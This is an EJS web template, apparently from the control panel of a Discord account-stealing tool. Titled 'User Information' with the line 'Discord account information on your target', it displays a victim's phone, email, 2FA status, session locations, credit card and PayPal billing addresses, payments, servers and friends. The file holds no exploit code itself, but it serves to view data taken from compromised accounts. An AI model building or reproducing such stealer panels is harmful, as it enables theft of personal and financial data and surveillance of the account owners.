<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>User</title>
    <script src="https://cdn.tailwindcss.com/"></script>
</head>
<body class="bg-slate-950">
    <div class="flex">
        <!-- sidebar -->
        <%- include("../components/sidebar.ejs"); %>

        <!-- content -->
        <div class="ml-80 p-4">
            <div class="w-96">
                <p class="text-white text-4xl font-medium">User Information</p>
                <p class="text-gray-400">Discord account information on your target</p>

                <div class="grid grid-cols-1 gap-4 mt-4">
                    <div class="bg-slate-900 p-4 rounded shadow-lg">
                        <p class="text-white text-2xl font-medium">User</p>
                        <code class="text-gray-400 whitespace-pre-line">Username: <%= userDataJson.username %>
Phone: <%= userDataJson.phone %>
Email: <%= userDataJson.email %>
Verified: <%= userDataJson.verified %>
2FA: <%= userDataJson.mfa_enabled %>
Locale: <%= userDataJson.locale %></code>
                    </div>
                    <div class="bg-slate-900 p-4 rounded shadow-lg">
                        <p class="text-white text-2xl font-medium">Sessions</p>
                        <code class="text-gray-400 whitespace-pre-line"><% userSessionsJson.user_sessions.forEach(( session ) => { %><%= session.client_info.os %> | <%= session.client_info.platform %> | <%= session.client_info.location %>
<% }); %></code>
                    </div>
                    <div class="bg-slate-900 p-4 rounded shadow-lg">
                        <p class="text-white text-2xl font-medium">Billing</p>
                        <% for (let i = 0; i < userBillingDataJson.length; i++) { %>
                            <% if (userBillingDataJson[i].type === 1) { %>
                                <p class="text-white font-medium">Credit Card</p>
                                <code class="text-gray-400 whitespace-pre-line">Brand: <%= userBillingDataJson[i].brand %>
Last 4: <%= userBillingDataJson[i].last_4 %>
Expires: <%= userBillingDataJson[i].expires_month %>/<%= userBillingDataJson[i].expires_year %>
Name: <%= userBillingDataJson[i].billing_address.name %>
Address: <%= userBillingDataJson[i].billing_address.line_1 %>
City: <%= userBillingDataJson[i].billing_address.city %>
State: <%= userBillingDataJson[i].billing_address.state %>
Country: <%= userBillingDataJson[i].billing_address.country %>
ZIP: <%= userBillingDataJson[i].billing_address.postal_code %></code>
                            <% } else if (userBillingDataJson[i].type === 2) { %>
                                <p class="text-white font-medium mt-4">PayPal</p>
                                <code class="text-gray-400 whitespace-pre-line">Email: <%= userBillingDataJson[i].email %>
Name: <%= userBillingDataJson[i].billing_address.name %>
Address: <%= userBillingDataJson[i].billing_address.line_1 %>
City: <%= userBillingDataJson[i].billing_address.city %>
State: <%= userBillingDataJson[i].billing_address.state %>
Country: <%= userBillingDataJson[i].billing_address.country %>
ZIP: <%= userBillingDataJson[i].billing_address.postal_code %></code>
                            <% } %>
                        <% } %>
                    </div>
                    <div class="bg-slate-900 p-4 rounded shadow-lg">
                        <p class="text-white text-2xl font-medium">Payments</p>
                        <code class="text-gray-400 whitespace-pre-line"><% for (let i = 0; i < userPaymentDataJson.length; i++) { %><%= userPaymentDataJson[i].description %>
<% } %></code>
                    </div>
                    <div class="bg-slate-900 p-4 rounded shadow-lg">
                        <p class="text-white text-2xl font-medium">Guilds</p>
                        <code class="text-gray-400 whitespace-pre-line"><% guildsDataJson.forEach(( guild ) => { %><%= guild.name %>
<% }); %></code>
                    </div>
                    <div class="bg-slate-900 p-4 rounded shadow-lg">
                        <p class="text-white text-2xl font-medium">Friends</p>
                        <code class="text-gray-400 whitespace-pre-line"><% friendsDataJson.forEach(( friend ) => { %><%= friend.user.username %>  (aka <%= friend.user.global_name %>)
<% }); %></code>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>